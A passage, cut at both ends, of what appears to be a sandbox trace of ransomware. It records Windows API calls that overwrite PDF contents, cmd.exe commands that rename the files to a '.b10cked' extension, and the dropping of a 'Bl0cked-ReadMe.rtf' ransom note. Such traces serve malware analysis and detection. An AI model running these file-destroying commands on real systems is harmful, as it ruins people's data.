(lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\tgRDf2UBQ_aR.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\tgrdf2ubq_ar.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19509435538) returned 1 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xe008 [0138.306] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, 
lpOverlapped=0x0) returned 1 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xe4f0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.307] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xe4f0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.308] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7277, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.308] WriteFile (in: hFile=0x114, 
lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7277, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointer (in: hFile=0x114, lDistanceToMove=-29303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7279 [0138.308] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7277, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7277, lpOverlapped=0x0) returned 1 [0138.309] SetFilePointer (in: hFile=0x114, lDistanceToMove=-29303, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7279 [0138.309] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x7277, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x7277, lpOverlapped=0x0) returned 1 [0138.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tgRDf2UBQ_aR.pdf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tgRDf2UBQ_aR.pdf", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tgRDf2UBQ_aR.pdf", lpUsedDefaultChar=0x0) returned 16 [0138.312] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xe4f0 [0138.313] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.313] CloseHandle (hObject=0x114) 
returned 1 [0138.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\tgRDf2UBQ_aR.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF") returned 0x48 [0138.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0138.315] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf54, dwThreadId=0xf44)) returned 1 [0138.333] CloseHandle (hObject=0x110) returned 1 [0138.333] CloseHandle (hObject=0x114) returned 1 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | 
out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.333] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.333] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.333] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.333] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.333] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.333] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.333] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0138.334] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.334] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.334] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xf68, dwThreadId=0xf64)) returned 1 [0138.346] CloseHandle (hObject=0x110) returned 1 [0138.346] CloseHandle (hObject=0x114) returned 1 [0138.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0138.347] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) 
returned 2 [0138.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.347] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.347] ReleaseMutex (hMutex=0xf8) returned 1 [0138.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\thcv85kw1kowsuqp.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19513660180) returned 1 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x747b [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.349] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6f93 [0138.349] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: 